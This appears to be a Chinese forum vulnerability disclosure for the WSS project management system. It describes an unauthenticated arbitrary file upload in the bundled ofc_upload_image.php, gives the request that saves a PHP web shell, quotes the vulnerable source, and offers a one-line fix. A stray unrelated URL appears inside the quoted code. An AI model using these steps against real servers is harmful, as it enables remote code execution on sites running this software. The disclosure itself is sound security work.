WSS项目管理系统Post get shell

  POST 数据

泛亚漏洞文件执行任意后缀文件保存

 漏洞文件/chart/php-ofc-library/ofc_upload_image.php

 

利用：

/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名

 

Post任意数据

保存位置http://localhost/chart/tmp-upload-images/hfy.php

​

 

最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~

 

<?php

 

//

// In Open Flash Chart -> save_image debug mode, you

// will see the 'echo' text in a new window.

//

 

/*

 

print_r( $_GET );

print_r( $_POST );

print_r( $_FILES );

 

print_r( $GLOBALS );

print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

 

*/

// default path for the image to be stored //

$default_path = '../tmp-upload-images/';

 

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

 

// full path to the saved image including filename //

$destination = $default_path . basename( $_GET[ 'name' ] ); 

 

echo 'Saving your image to: '. $destination;

// print_r( $_POST );

// print_r( $_SERVER );

// echo $HTTP_RAW_POST_DATA;

 

//

// POST data is usually string data, but we are passing a RAW .png

// so PHP is a bit confused and $_POST is empty. But it has saved

// the raw bits into $HTTP_RAW_POST_DATA

//

 

$jfh = fopen($destination, 'w') or die("can't open file");

fwrite($jfh, $HTTP_RAW_POST_DATA);

fclose($jfh);

 

//

// LOOK:

//

exit();

  //

// PHP5:

//

 

 

// default path for the image to be stored //

$default_path = 'tmp-upload-images/';

 

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

 

// full path to the saved image including filename //

$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); 

 

// move the image into the specified directory //

if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {

    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";

} else {

    echo "FILE UPLOAD FAILED";

}

 

 http://www.777avia.com

?>

​ 修复方案：

 

这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞